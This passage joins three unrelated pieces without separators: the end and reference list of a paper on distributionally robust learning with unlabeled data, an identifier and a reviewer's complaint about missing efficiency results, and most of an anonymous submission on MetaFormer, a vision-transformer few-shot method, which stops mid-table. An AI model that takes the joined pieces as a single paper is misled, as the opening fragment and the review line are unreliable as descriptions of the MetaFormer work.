We derive refined generalization-error results for both robust and non-robust scenarios, employing a technique based on optimizing a robust loss together with a regularizer that avoids crowded and dense areas. Our framework integrates tools from self-training, distributionally robust learning, and optimal transport. Experiments on synthetic and real-world datasets validate our theoretical findings, demonstrating improved classification accuracy, even for non-Gaussian cases, by incorporating out-of-domain unlabeled samples. Our methodology hinges on leveraging such data to enhance robust accuracy and on adapting the uncertainty-neighborhood radius based on the labeled and unlabeled sample quantities to strike a balance between bias and variance in the classification error.

For future work, there is room for improving and relaxing the conditions under which unlabeled data are useful. Exploring error lower bounds and impossibility results presents another intriguing avenue. Additionally, relaxing the constraints on the level of distribution shift for out-of-domain samples could be a promising direction.

REFERENCES

Jean-Baptiste Alayrac, Jonathan Uesato, Po-Sen Huang, Alhussein Fawzi, Robert Stanforth, and Pushmeet Kohli. Are labels required for improving adversarial robustness? *Advances in Neural Information Processing Systems*, 32, 2019.

Massih-Reza Amini and Patrick Gallinari. Semi-supervised logistic regression. In *ECAI*, volume 2, pp. 11, 2002.

Hassan Ashtiani, Shai Ben-David, Nicholas Harvey, Christopher Liaw, Abbas Mehrabian, and Yaniv Plan. Nearly tight sample complexity bounds for learning mixtures of gaussians via sample compression schemes. *Advances in Neural Information Processing Systems*, 31, 2018.

B. S. Veeling, J. Linmans, J. Winkens, T. Cohen, and M. Welling. Rotation equivariant CNNs for digital pathology, September 2018.

Battista Biggio and Fabio Roli. Wild patterns: Ten years after the rise of adversarial machine learning. In *Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security*, pp. 2154–2156, 2018.

Jose Blanchet and Yang Kang. Semi-supervised learning based on distributionally robust optimization. *Data Analysis and Applications 3: Computational, Classification, Financial, Statistical and Stochastic Methods*, 5:1–33, 2020.

Jose Blanchet, Yang Kang, and Karthyek Murthy. Robust wasserstein profile inference and applications to machine learning. *Journal of Applied Probability*, 56(3):830–857, 2019.

Nicholas Carlini and David Wagner. Towards evaluating the robustness of neural networks. In *2017 IEEE Symposium on Security and Privacy (SP)*, pp. 39–57. IEEE, 2017.

Yair Carmon, Aditi Raghunathan, Ludwig Schmidt, John C Duchi, and Percy S Liang. Unlabeled data improves adversarial robustness. *Advances in Neural Information Processing Systems*, 32, 2019.

Richard J. Chen and Rahul G. Krishnan. Self-supervised vision transformers learn visual concepts in histopathology. *CoRR*, abs/2203.00585, 2022.

Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In *2009 IEEE Conference on Computer Vision and Pattern Recognition*, pp. 248–255. IEEE, 2009.

Zhun Deng, Linjun Zhang, Amirata Ghorbani, and James Zou. Improving adversarial robustness via unlabeled out-of-domain data. In *International Conference on Artificial Intelligence and Statistics*, pp. 2845–2853. PMLR, 2021.

Charlie Frogner, Sebastian Claici, Edward Chien, and Justin Solomon.
Incorporating unlabeled data into distributionally robust learning. *Journal of Machine Learning Research*, 22(56):1–46, 2021.

Rui Gao. Finite-sample guarantees for wasserstein distributionally robust optimization: Breaking the curse of dimensionality. *Operations Research*, 2022.

Ian J Goodfellow, Jonathon Shlens, and Christian Szegedy. Explaining and harnessing adversarial examples. *arXiv preprint arXiv:1412.6572*, 2014.

Yves Grandvalet and Yoshua Bengio. Semi-supervised learning by entropy minimization. *Advances in Neural Information Processing Systems*, 17, 2004.

Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian Sun. Deep residual learning for image recognition. In *Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition*, pp. 770–778, 2016.

Jakob Nikolas Kather, Niels Halama, and Alexander Marx. 100,000 histological images of human colorectal cancer and healthy tissue, April 2018.
RpKA1wqgk0
The paper does not demonstrate any efficiency gains from the proposed attention design. This is unconvincing, as one of the primary motivations described in the introduction is to reduce the computational cost of attention in ViTs when adapting them for meta-learning.
MetaFormer with Holistic Attention Modelling Improves Few-Shot Classification

Anonymous authors
Paper under double-blind review

Abstract

Pre-trained vision transformers have revolutionized few-shot image classification, and it has recently been demonstrated that the previously common practice of meta-learning, in synergy with these pre-trained transformers, still holds significance and contributes to further advancing their performance. Unfortunately, the majority of working insights in meta-learning, such as task conditioning, are specifically tailored to convolutional neural networks and thus fail to translate effectively to vision transformers. This work sets out to bridge this gap via a coherent and lightweight framework called MetaFormer, which maintains compatibility with off-the-shelf pre-trained vision transformers. The proposed MetaFormer consists of two attention modules, i.e., the Sample-level Attention Module (SAM) and the Task-level Attention Module (TAM). SAM works in conjunction with the patch-level attention in Transformers to enforce consistency in the attended features across samples within a task, while TAM regularizes learning of the current task with an attended task in the pool. Empirical results on four few-shot learning benchmarks, i.e., miniImageNet, tieredImageNet, CIFAR-FS, and FC100, showcase that our approach achieves the new state of the art at a very modest increase in computational overhead. Furthermore, our approach excels in cross-domain task generalization scenarios.

1 Introduction

There has been a sustained focus on few-shot learning (Vinyals et al., 2016b; Snell et al., 2017), where only a few labeled samples (support) are given for predicting unlabeled samples (query), aiming to approach human-level intelligence that can rapidly grasp new concepts. Meta-learning (Thrun & Pratt, 2012) has been a de-facto approach to few-shot learning, leveraging the knowledge learned from previous tasks (Finn et al., 2017; Raghu et al., 2019).

Recently, pre-trained Vision Transformers (ViTs) have impressively rivaled traditional Convolutional Neural Networks (CNNs) across diverse vision tasks (Dosovitskiy et al., 2020; Liu et al., 2021; Zhu et al., 2020; Ranftl et al., 2021; Strudel et al., 2021). Their impact has extended to few-shot image classification as well (He et al., 2022b; Dong et al., 2022; Lin et al., 2023). More notably, recent research suggests that meta-learning can effectively synergize with these pre-trained transformers to further enhance their few-shot learning performance (Hiller et al., 2022; Hu et al., 2022). Despite the initial success of directly adapting ProtoMAML (Triantafillou et al., 2020) and ProtoNet (Snell et al., 2017) in Hiller et al. (2022); Hu et al. (2022), the potential of leveraging other essential meta-learning advancements, such as conditional meta-learning (Yao et al., 2019; Garnelo et al., 2018) that accommodates a diverse range of tasks, remains unexplored in the context of ViTs.

The core idea behind conditional meta-learning is to learn the relationship between tasks through task embeddings (Yao et al., 2020; Zhou et al., 2021a; Jiang et al., 2022), so that the transferable knowledge shared among only closely related tasks improves generalization. Accurately modeling task relationships under ViTs, however, poses a non-trivial challenge due to the expensive computational costs involved. For instance, considering $n$ patches per image and $NK$ support images in an $N$-way $K$-shot task, holistic attention across a total of $N_T$ tasks could have a time complexity of up to $\mathcal{O}((nNKN_T)^2)$. Given the oftentimes huge $N_T$, the number of episodic tasks sampled, straightforward holistic attention becomes prohibitively expensive.
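A quick back-of-the-envelope computation makes this concrete (illustrative numbers of our own choosing: $n = 196$ patches as in a ViT with a $14 \times 14$ grid, a 5-way 1-shot support set, and $N_T = 10^4$ episodes):

```python
# Rough cost of one holistic attention matrix over all episodes (illustrative numbers).
n, N, K, N_T = 196, 5, 1, 10_000           # patches per image, ways, shots, episodes
tokens = n * N * K * N_T                    # every patch of every support image of every task
attn_entries = tokens ** 2                  # self-attention is quadratic in the token count
print(f"{tokens:,} tokens -> {attn_entries:.3e} attention entries")
# 9,800,000 tokens -> 9.604e+13 attention entries: clearly infeasible to materialize.
```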
In this work, we are motivated to propose a novel ViT-backed framework dubbed MetaFormer, which leverages the strength of self-attention for meta-learning while avoiding substantial computational overhead. Specifically, we break down the holistic attention into two stages, i.e., intra-task and inter-task interactions. In the first stage, we propose the Sample-level Attention Module (SAM) to accurately and efficiently model sample relationships within a task. By separately applying spatial attention, implemented by the original ViT modules, and sample attention in multiple layers, SAM alleviates the high computational complexity and captures coarse-to-fine sample relationships. We implement the sample attention with a sample-wise attention mask, which not only enhances the consistency in identifying task-specific discriminative features but also facilitates the extension to autoregressive inference that takes interactions between query samples into consideration. Secondly, we propose the Task-level Attention Module (TAM) to model inter-task interactions. TAM automatically learns a task-specific probe vector, which summarizes the discriminative patterns of a task. Based on the probe vector, TAM retrieves the most relevant semantic feature patterns from seen tasks to regularize learning of the current task. To cope with the huge number of historical tasks, TAM consolidates the probe vectors of previous tasks into a dynamic knowledge pool for retrieval. By stacking SAM and TAM with the original ViT modules to formulate holistic attention, MetaFormer fully exploits knowledge within and across tasks and thereby demonstrates significant performance gains on established few-shot learning benchmarks.

The main contributions of our work are summarized as follows:

• We propose MetaFormer, a ViT-backed meta-learning method that takes full advantage of transformer characteristics for few-shot image classification and remains compatible with state-of-the-art pre-trained ViT backbones.

• We introduce an autoregressive few-shot image classification setting to leverage query relationships and show that our method can be easily extended to this setting via the sample attention mask.

• Extensive experiments demonstrate that our MetaFormer outperforms state-of-the-art meta-learning methods on four widely used few-shot learning benchmarks, including miniImageNet (Vinyals et al., 2016b), tieredImageNet (Ren et al., 2018b), CIFAR-FS (Bertinetto et al., 2019), and FC100 (Oreshkin et al., 2018). It also achieves remarkable performance on eight cross-domain benchmarks (Oh et al., 2022) and on multi-domain benchmarks (Triantafillou et al., 2020).

2 RELATED WORK

Meta-Learning in Few-Shot Classification. Meta-learning serves as a fundamental framework for few-shot learning, with the aim of transferring prior knowledge for quickly adapting to new unseen tasks. Most related to our work are metric-based and generation-based meta-learning methods.
Metric-based methods (Vinyals et al., 2016b; Snell et al., 2017; Oreshkin et al., 2018; Lee et al., 2019; Chen et al., 2021a; Zhang et al., 2020a; Ma et al., 2021c; Simon et al., 2020) seek to embed samples into global, universal feature representations and use a nearest-neighbor algorithm to measure sample similarity in the embedding space for prediction. However, a fixed embedding is neither robust nor sufficient to accommodate tasks with significant shifts due to cluttered backgrounds and intricate scenes. To adapt the feature embedding to new tasks, several approaches perform task adaptation utilizing within-support (Rusu et al., 2018; Ye et al., 2020) and support-query (Xu et al., 2020; Hou et al., 2019; Doersch et al., 2020; Kang et al., 2021) sample relationships. Besides, parameter-generation methods directly generate task-conditioned parameters for task adaptation (Qiao et al., 2018; Ma et al., 2021b; Sun et al., 2021; Bertinetto et al., 2016; Gidaris & Komodakis, 2019; Munkhdalai et al., 2018; Cai et al., 2018), such as convolution kernel parameters (Ma et al., 2021b; Zhmoginov et al., 2022) and batch normalization parameters (Requeima et al., 2019; Bateni et al., 2020). However, many techniques such as task conditioning are specially tailored to CNNs and thus fail to translate effectively to vision transformers. Our approach is dedicated to fully leveraging the attention characteristics of vision transformers for intra- and inter-task interactions.

Inter-task knowledge sharing. The meta-learning objective is to organize and distill previous knowledge for future reuse when adapting to new unseen tasks. To handle tasks with different distributions, a handful of works built upon gradient-based methods try to extract the underlying task structure for customizing the initialization (Yao et al., 2019; 2020; Zhou et al., 2021a; Jiang et al., 2022). However, these algorithms rely on time-consuming clustering, and discriminative task representations are difficult to learn (Jiang et al., 2022). In this paper, we adopt a knowledge pool to learn structured meta-knowledge (i.e., key feature patterns), which is then tailored to the current task through attention-based aggregation. We show later that this achieves a better trade-off between task-specific and task-agnostic knowledge sharing. Recent works (Wang et al., 2022a; Smith et al., 2023; Douillard et al., 2022; Wang et al., 2022b) propose the prompt pool and use inter-task attention in continual learning settings to prevent catastrophic forgetting, which differs from our meta-learning setting.

**Vision Transformers in Few-Shot Learning.** Vision Transformers (Dosovitskiy et al., 2020; Liu et al., 2021; Tu et al., 2022) utilize the self-attention mechanism to encode long-range dependencies in the data. Recent works increasingly design self-distillation pretraining to train few-shot transformers (He et al., 2022b; Dong et al., 2022; Lin et al., 2023). For example, HCTransformers (He et al., 2022b) utilizes the DINO-based (Caron et al., 2021) teacher-student framework to distill the global class token and trains three cascaded transformers with two pooling layers in between. To further supervise the patch tokens, SUN (Dong et al., 2022) adopts patch-level pseudo labels generated by the teacher network, and SMKD (Lin et al., 2023) introduces the patch reconstruction loss of Masked Image Modeling (MIM) (He et al., 2022a; Bao et al., 2022; Zhou et al., 2022a).
These methods seek a generalizable feature embedding that is fixed across tasks. However, previous meta-learning methods (Hu et al., 2022; Hiller et al., 2022) have shown that meta-learning is beneficial for transferring past knowledge for feature adaptation. FewTURE (Hiller et al., 2022) learns a support-aware patch importance mask in the inner loop to mitigate the supervision collapse issue. Yet it applies this only in the top classifier, giving the network little opportunity to refine its features to adapt to a new task with large variance. Thus there is an opportunity to further develop the meta-learning framework specifically to exploit the strengths of vision transformers. Similarly, we also ground our proposed meta-learning method on pre-trained vision transformers, but we embed the sample relationship into the ViT with hierarchical task attention to learn more discriminative features for each task. Our contribution is thus orthogonal to SMKD, and we empirically show that MetaFormer can further improve the joint performance.

### 3 MetaFormer for Few-shot Classification

We present our approach in this section. The overall architecture of our MetaFormer is illustrated in Figure 1. We start by briefly introducing the few-shot image classification setting and the self-attention of the vision transformer in Section 3.1, and then elaborate on our proposed Sample-level Attention Module (SAM) and Task-level Attention Module (TAM) in Section 3.2 and Section 3.3, respectively. Finally, using SAM and TAM as the core building blocks, we present a new vision transformer with holistic attention for meta-learning in Section 3.4.

3.1 Preliminaries

Problem formulation. Few-shot learning aims to learn a model that can adapt to recognize new classes with only a few labeled examples. We adopt the episodic training manner following previous works (Vinyals et al., 2016b; Hiller et al., 2022). In a classical $N$-way $K$-shot setting, each episode randomly selects $N$ classes to form the support set $C = \{(x^c_j, y^c_j)\}_{j=1}^{N \times K}$ containing $K$ samples per class and the query set $T = \{(x^t_j, y^t_j)\}_{j=1}^{M}$ with $M$ samples. Predictions are independent for every query sample under the inductive protocol (Vinyals et al., 2016b). We also introduce the autoregressive setting from regression tasks (Nguyen & Grover, 2022; Bruinsma et al., 2023) to classification tasks, where we autoregressively predict query samples and allow interactions between subsequent query samples and those predicted earlier.

Self-attention in Vision Transformers. Given an $N$-way $K$-shot task as input $X \in \mathbb{R}^{(NK+M) \times H \times W \times 3}$, ViTs (Dosovitskiy et al., 2020) first divide individual images into $n$ non-overlapping patches and then map them into $d$-dimensional tokens through a linear projection layer. After that, a trainable class token is prepended, giving the final input token sequence $X \in \mathbb{R}^{(NK+M) \times L \times d}$ ($L = n + 1$), which is processed by several multi-head self-attention (MSA) layers and MLP layers for feature extraction. Consider an MSA layer with $H$ heads, where the query, key, and value embeddings of the input $X$ are given as $Q = W^Q X$, $K = W^K X$, $V = W^V X$, respectively.
The output of MSA is given as:
$$\text{MSA}(Q, K, V) = \text{Concat}(h_1, \ldots, h_H) W^O, \quad \text{where } h_i = \sigma(A_i)V_i = \sigma\left(\frac{Q_i K_i^\top}{\sqrt{d_k}}\right)V_i$$ (1)
where $W^O$ is the output projection matrix; $d_k = d/H$ is the head dimension; $\sigma(\cdot)$ denotes the softmax activation function; and $A_i \in \mathbb{R}^{L \times L}$ is the attention matrix measuring pairwise token affinity at different spatial locations. After the MSA of equation 1, every token within the image is aware of the global spatial information, and we thus term MSA the spatial attention module.

3.2 Sample-Level Attention Module

To facilitate sample correspondence learning for task adaptation, most existing methods incorporate extra modules on top of a feature extractor with a global feature embedding (Ye et al., 2020; Doersch et al., 2020; Hiller et al., 2022). However, it has been demonstrated that different layers of the backbone yield different semantic levels of feature embedding and thus different types of knowledge (Raghu et al., 2021). Motivated by this, we propose to leverage coarse-to-fine multi-scale information across layers to capture discriminative sample interactions at the patch-token level.

Joint Space-Sample Attention. A straightforward and intuitive approach is to perform self-attention over both the spatial and sample dimensions simultaneously. Given the task input $X$, the core computation of one MSA layer primarily revolves around calculating the attention matrix $A_J \in \mathbb{R}^{(NK+M)L \times (NK+M)L}$ in equation 1. Therefore, the complexity of the joint space-sample attention is $O((NK + M)^2 L^2)$. Such joint space-sample interaction empowers the vision transformer to capture sample relationships for task-specific embedding, but it comes at a high computational cost and incurs a heavy memory footprint.

Decoupled Space-Sample Attention. To alleviate the computational complexity, we propose a more efficient architecture designed to decouple spatial attention and sample attention, illustrated in Figure 1(b). In the decoupled space-sample attention, within each layer, our approach initially computes spatial-only attention as in equation 1 to obtain features that isolate backgrounds and emphasize the underlying objects. Subsequently, we reshape the token sequence to $\mathbb{R}^{L \times (NK+M) \times d}$, which is fed to an MSA with sample attention matrix $A_S \in \mathbb{R}^{(NK+M) \times (NK+M)}$, incorporating sample interactions across all patches at the same spatial location to capture the similarities and variances among samples; this is essential for feature extraction in a given task to discern task-specific discriminative regions. As such, the computational complexity is reduced to \( O(L(NK + M)^2 + (NK + M)L^2) \). See Figure 5 in Appendix B for an illustration. Though this decoupling shares its spirit with video transformers (Ho et al., 2019; Bertasius et al., 2021), it is crucial to highlight that our consideration of the sample-to-sample relationship in few-shot learning presents a unique challenge distinct from the frame-to-frame relationship in videos, i.e., query samples have to be differentiated from support ones. This challenge motivates the following introduction of sample causal masks.

**Sample-level Attention Module (SAM).** As shown in Figure 1(c), we introduce our Sample-level Attention Module (SAM) with label infusion and the designed causal masking mechanism to further enforce consistency in the attended features across samples within a task.
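Before detailing SAM's components, the decoupled space-sample attention above, together with the sample mask it will use, can be condensed into a short sketch (a single-head, projection-free simplification of our own; the actual module uses the ViT's multi-head blocks):

```python
import torch

def decoupled_space_sample_attention(X, sample_mask=None):
    """Spatial attention followed by sample attention, as in the decoupled scheme.

    X:           (B, L, d) tokens for B = NK + M samples with L tokens each.
    sample_mask: optional (B, B) binary mask H restricting sample interactions.
    """
    B, L, d = X.shape
    # 1) Spatial attention within each sample: B matrices of size (L, L)
    #    instead of one (BL, BL) matrix as in the joint scheme.
    A_spatial = torch.softmax(X @ X.transpose(1, 2) / d ** 0.5, dim=-1)
    X = A_spatial @ X
    # 2) Sample attention across samples at each spatial location: (L, B, B).
    Xs = X.transpose(0, 1)                                   # (L, B, d)
    A_sample = torch.softmax(Xs @ Xs.transpose(1, 2) / d ** 0.5, dim=-1)
    if sample_mask is not None:
        A_sample = A_sample * sample_mask                    # element-wise masking
    return (A_sample @ Xs).transpose(0, 1)                   # back to (B, L, d)
```

Under the inductive protocol, the mask would let support rows attend only among supports and each query row attend to the supports and itself; the autoregressive variant additionally opens query-to-earlier-query entries.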
We first obtain the embedded support category information \( W^c y \in \mathbb{R}^{1 \times d} \) via a linear projection matrix \( W^c \), which is infused into the support tokens through element-wise addition. For the obtained sample attention \( A_S \), we maintain a sample causal mask \( H \in \mathbb{R}^{(NK+M) \times (NK+M)} \) to restrict the sample interaction patterns as:
\[
\hat{A}_S = A_S \odot H
\] (2)
where \( \odot \) is the element-wise product. Under this constraint, support samples attend to one another to strengthen intra- and inter-class discriminative clues, which query samples then utilize for task-specific feature consistency learning. Note that this masking mechanism also makes our method comply with the inductive protocol. In the autoregressive scenario, we further extend SAM with an autoregressive causally-masked sample attention to embed query-query interactions into the vision transformer. Figure 2(b) shows an example mask with \( N = 4 \) and \( K = 1 \). Query samples attend to support samples and earlier predicted queries in an autoregressive fashion, which thus serves to implicitly expand the support set for subsequent query predictions.

### 3.3 Task-level Attention Module

In this section, we introduce the details of the proposed Task-level Attention Module (TAM), as illustrated in Figure 1(d). The goal of TAM is to transfer previous task knowledge to regularize adaptation to the current task. To this end, we introduce a knowledge pool, consolidated during meta-training, to organize learned knowledge. When a new task arrives, we first acquire the task-specific probe vector to represent the current task. It taps into the knowledge pool to retrieve relevant knowledge from historical tasks, which is fused in to enhance the support feature representations. We elaborate on the four key components as follows: task probe vector aggregation, knowledge retrieval, pool consolidation, and knowledge fusion.

**Task Probe Vector Aggregation.** Given a task consisting of support and query sets, we first gather the task information with learnable task probe vectors \( G \in \mathbb{R}^{T \times d} \), which are computed along with the support patch tokens \( X_c \) to aggregate the key parts of samples and the whole task representation. Specifically, we perform the task aggregation using attention as:
\[
\text{Aggregation}(Q_G, K_{X_c}, V_{X_c}) = \text{MSA}(Q_G, K_{X_c}, V_{X_c})
\] (3)
where \( Q_G \) is the query embedding of the task probe vectors; \( K_{X_c} \) and \( V_{X_c} \) are the key and value embeddings of the support patch tokens, respectively. This allows the task probe vectors to focus on relevant task-specific feature patterns and ignore irrelevant semantics of each sample.

**Knowledge Retrieval.** After gathering the task information, we retrieve relevant knowledge using a simple weighted-summation strategy from the knowledge pool \( P \in \mathbb{R}^{Z \times d} \) with \( Z \) components (introduced below). The retrieval is formulated as:
\[
R = \sum_z \gamma(G, P_z) P_z
\] (4)
where $\gamma$ is a score function based on the cosine similarity between task probe vectors and pool components. $R \in \mathbb{R}^{T \times d}$ is the retrieved historical knowledge, which can be thought of as key feature semantics (e.g., the ears and eyes of a dog) related to the current task samples.

**Pool Consolidation.** During meta-training, we maintain a knowledge pool $P$ updated by every sequentially arriving task.
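Before turning to the consolidation step, the aggregation and retrieval operations above can be summarized in a short sketch (our own single-head simplification; the learnable projections of the actual MSA blocks and the pool update are omitted):

```python
import torch
import torch.nn.functional as F

def tam_aggregate_and_retrieve(G, X_c, P):
    """Task probe aggregation (eq. 3) and knowledge retrieval (eq. 4), simplified.

    G:   (T, d) learnable task probe vectors
    X_c: (S, d) support patch tokens, flattened over samples and positions
    P:   (Z, d) knowledge pool components
    """
    d = G.shape[-1]
    # Aggregation: probes attend to support tokens (single head, no projections).
    attn = torch.softmax(G @ X_c.T / d ** 0.5, dim=-1)            # (T, S)
    G = attn @ X_c                                                # task-specific probes
    # Retrieval: cosine-similarity scores against the pool, then a weighted sum.
    scores = F.normalize(G, dim=-1) @ F.normalize(P, dim=-1).T    # (T, Z)
    R = scores @ P                                                # retrieved knowledge
    return G, R
```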
To consolidate the learned knowledge in the pool, we select relevant components from the pool and integrate them with the new information brought by the current task as follows:
$$P_s = P_s + G_i$$ (5)
where $s = \arg\max_z \gamma(G_i, P_z)$, i.e., the pool component most similar to the $i$-th task probe vector. This scheme also allows us to control the pool size and the memory consumption.

**Knowledge Fusion.** To regularize the adaptation to new tasks with historical knowledge, we deliver the union of the original task vectors $G$ and the retrieved knowledge $R$ to enhance the support patch token representations via the attention mechanism as follows:
$$\text{Fusion}(Q_{X_c}, K_{[G;R]}, V_{[G;R]}) = \text{MSA}(Q_{X_c}, K_{[G;R]}, V_{[G;R]})$$ (6)
where $Q_{X_c}$ is the query embedding of the support patch tokens, and $K_{[G;R]}$ and $V_{[G;R]}$ are the key and value embeddings of the regularized task-specific semantics, respectively. The intuition here is to leverage well-learned feature semantics from previous similar tasks to strengthen discriminative regions in the new task.

### 3.4 MetaFormer with Holistic Attention

Using SAM and TAM as the basic building blocks working in conjunction with the original ViT modules, we propose a new vision transformer with holistic attention, named MetaFormer $f_\theta$, customized for meta-learning in few-shot image classification. Holistic attention incorporates both intra- and inter-task interactions at different semantic levels to extract rich task-specific feature representations and thus adapt to new tasks more effectively. Built upon the feature embedding extracted by MetaFormer, we estimate the class patch prototypes by averaging the support patch tokens per class, $p_k = \frac{1}{|C^k|} \sum_{x \in C^k} f_\theta(x)$. Query samples are predicted based on patch-wise cosine similarity with the prototypes (Lai et al., 2022; Hiller et al., 2022). The probability of the $k$-th category is:
$$P(\hat{y}_t = k | x_t) = \frac{e^{d(f_\theta(x_t), p_k)/\tau}}{\sum_c e^{d(f_\theta(x_t), p_c)/\tau}}$$ (7)
where $d(\cdot,\cdot)$ denotes the cosine similarity and $\tau$ is a scaling temperature. The cross-entropy loss with the few-shot labels $y_t$ is:
$$L_{CE} = -\sum_{t=1}^{M} \log P(\hat{y}_t = y_t | x_t)$$ (8)

**Autoregressive Inference.** In the autoregressive setting, we propose to enrich the support prototypes by feeding previously predicted queries as an auxiliary support set $Q$ with the predicted probability of belonging to class $k$. We take $P(\hat{y}_t = k | x_t)$ as sample weights and estimate auxiliary prototypes in a weighted-average manner, $\hat{p}_k = \frac{1}{\sum_{x \in Q^k} P(k | x)} \sum_{x \in Q^k} P(k | x) f_\theta(x)$. The new prototypes are then given by the mean of $p_k$ and $\hat{p}_k$. Since modeling dependencies between all $M$ query samples requires $M$ prototype updates, we instead sample $r$ queries at a time to achieve faster and more consistent prototype updates.
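As a concrete picture of the prototype-based prediction in equations 7 and 8, the following sketch (ours; it uses pooled per-sample features instead of the patch-wise prototypes of the actual method, for brevity) computes cosine-similarity logits against class prototypes:

```python
import torch
import torch.nn.functional as F

def prototype_logits(query_feats, support_feats, support_labels, num_classes, tau=0.1):
    """Cosine-similarity classification against class prototypes.

    query_feats:    (M, d)  encoded query samples f_theta(x_t)
    support_feats:  (NK, d) encoded support samples
    support_labels: (NK,)   integer class ids in [0, num_classes)
    Returns (M, num_classes) logits; softmax over them gives eq. (7),
    and cross-entropy on them gives eq. (8).
    """
    protos = torch.stack([
        support_feats[support_labels == k].mean(dim=0) for k in range(num_classes)
    ])                                                            # (N, d) prototypes p_k
    sims = F.normalize(query_feats, dim=-1) @ F.normalize(protos, dim=-1).T
    return sims / tau                                             # temperature-scaled logits
```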
### 4 Experiments

We evaluate the effectiveness of our proposed MetaFormer on few-shot image classification tasks, covering standard in-domain few-shot learning in Section 4.1 and a broader study of cross-domain and multi-domain few-shot learning in Section 4.2. Additionally, we conduct ablation studies to verify the effectiveness of the proposed holistic attention modeling with the Sample-level Attention Module (SAM) and the Task-level Attention Module (TAM) in Section 4.3, followed by a qualitative analysis in Section 4.4.

4.1 STANDARD FEW-SHOT LEARNING

Datasets. We train and evaluate our MetaFormer on four standard few-shot benchmarks: miniImageNet (Vinyals et al., 2016b), tieredImageNet (Ren et al., 2018b), CIFAR-FS (Bertinetto et al., 2019), and FC100 (Oreshkin et al., 2018). In all experiments, we follow the same standard data usage specifications as Hiller et al. (2022), splitting the data into a meta-training set, a meta-validation set, and a meta-test set with mutually exclusive classes across sets. The details of each dataset are described in Appendix L.1.

Implementation Details. We train our method in two stages following Hiller et al. (2022): self-supervised pretraining and meta-tuning. We first pre-train our vision transformer backbone (Dosovitskiy et al., 2020; Liu et al., 2021) utilizing a self-supervised training objective (Zhou et al., 2022a). Subsequently, we integrate our proposed SAM and TAM into the original vision transformer for meta-learning. We denote by MetaFormer-I the variant that predicts queries independently in the inductive setting, and by MetaFormer-A the variant for the autoregressive scenario. Further details of the training and evaluation settings are included in Appendix L.2.

Comparison to the State-of-the-Art Methods. The comparison results with related or recent state-of-the-art (SOTA) methods on miniImageNet and tieredImageNet are shown in Table 1. Our method significantly outperforms previous state-of-the-art meta-learning approaches. For example, on miniImageNet, MetaFormer-I surpasses its meta-learning competitor FewTURE (Hiller et al., 2022) by 7.76% and 5.51% in the 1-shot and 5-shot settings, respectively. This demonstrates the remarkable effectiveness of our proposed holistic attention mechanism in fully leveraging the transformer's potential for meta-learning. SMKD+MetaFormer-I also outperforms self-distillation based methods (He et al., 2022b; Lin et al., 2023). Table 2 displays results on the CIFAR-FS and FC100 datasets. MetaFormer-I again achieves better performance than previous methods, showing the superiority of our proposed approach. We note that our MetaFormer-A enhances performance further, establishing a new baseline for autoregressive few-shot image classification tasks. See Table 4 in Appendix C for the comparison with the Swin backbone.

Table 1: Average classification accuracy (%) for 5-way 1-shot and 5-way 5-shot scenarios. Reported are the mean and 95% confidence interval on the unseen test sets of miniImageNet (Vinyals et al., 2016a) and tieredImageNet (Ren et al., 2018a), using the established evaluation protocols.
| Method | Backbone | # Params | miniImageNet 1-shot | miniImageNet 5-shot | tieredImageNet 1-shot | tieredImageNet 5-shot | |-------------------------|----------|----------|--------------------|--------------------|------------------------|------------------------| | MatchNet (Vinyals et al., 2016b) | ResNet-12 | 12.4 M | 61.24±0.29 | 73.93±0.23 | 71.01±0.33 | 83.12±0.24 | | ProtoNet (Snell et al., 2017) | ResNet-12 | 12.4 M | 62.29±0.33 | 79.46±0.48 | 68.25±0.23 | 84.01±0.56 | | FEAT (Ye et al., 2020) | ResNet-12 | 14.1 M | 66.78±0.20 | 82.05±0.14 | 70.80±0.23 | 84.79±0.16 | | DeepEMD (Zhang et al., 2020a) | ResNet-12 | 12.4 M | 65.91±0.82 | 82.41±0.56 | 71.16±0.87 | 86.03±0.58 | | IEPT (Zhang et al., 2020b) | ResNet-12 | 12.4 M | 67.05±0.44 | 82.90±0.30 | 72.24±0.50 | 86.73±0.34 | | MELR (Fei et al., 2020) | ResNet-12 | 14.1 M | 67.40±0.43 | 83.40±0.28 | 72.14±0.51 | 87.01±0.35 | | FRN (Wertheimer et al., 2021) | ResNet-12 | 12.4 M | 66.45±0.19 | 82.83±0.13 | 72.06±0.22 | 86.89±0.14 | | CG (Zhao et al., 2021) | ResNet-12 | 12.4 M | 67.02±0.20 | 82.32±0.14 | 71.66±0.23 | 85.50±0.15 | | DMF (Xu et al., 2021) | ResNet-12 | 12.4 M | 67.76±0.46 | 82.71±0.31 | 71.89±0.52 | 85.96±0.35 | | BML (Zhou et al., 2021b) | ResNet-12 | 12.4 M | 67.04±0.63 | 83.63±0.29 | 68.99±0.50 | 85.49±0.34 | | CNL (Zhao et al., 2021) | ResNet-12 | 12.4 M | 67.96±0.98 | 83.36±0.51 | 73.42±0.95 | 87.72±0.75 | | Meta-NVG (Zhang et al., 2021a) | ResNet-12 | 12.4 M | 67.14±0.80 | 83.82±0.51 | 74.58±0.88 | 86.73±0.61 | | RENet (Kang et al., 2021) | ResNet-12 | 12.6 M | 67.60±0.44 | 82.58±0.30 | 71.61±0.51 | 85.28±0.35 | | PAL (Ma et al., 2021a) | ResNet-12 | 12.4 M | 69.37±0.64 | 84.40±0.44 | 72.25±0.72 | 86.95±0.47 | | COSOC (Luo et al., 2021) | ResNet-12 | 12.4 M | 69.28±0.49 | 85.16±0.42 | 73.57±0.43 | 87.57±0.10 | | Meta DeepBDC (Xie et al., 2022) | ResNet-12 | 12.4 M | 67.34±0.43 | 84.46±0.28 | 72.34±0.40 | 87.31±0.32 | | LEO (Rusu et al., 2020) | WRN-16-10 | 36.8 M | 61.76±0.08 | 77.59±0.12 | 68.04±0.14 | 84.44±0.09 | | MetaMIL (Xu et al., 2020) | WRN-28-10 | 37.7 M | 62.01±0.30 | 78.01±0.16 | 67.72±0.14 | 83.36±0.12 | | CCNet (Gidaris et al., 2019) | WRN-28-10 | 36.5 M | 62.93±0.30 | 78.87±0.08 | 70.53±0.11 | 84.98±0.36 | | FEAT (Ye et al., 2020) | WRN-28-10 | 38.1 M | 65.10±0.30 | 81.11±0.14 | 70.41±0.23 | 84.38±0.16 | | MetaQDA (Zhang et al., 2021c) | WRN-28-10 | 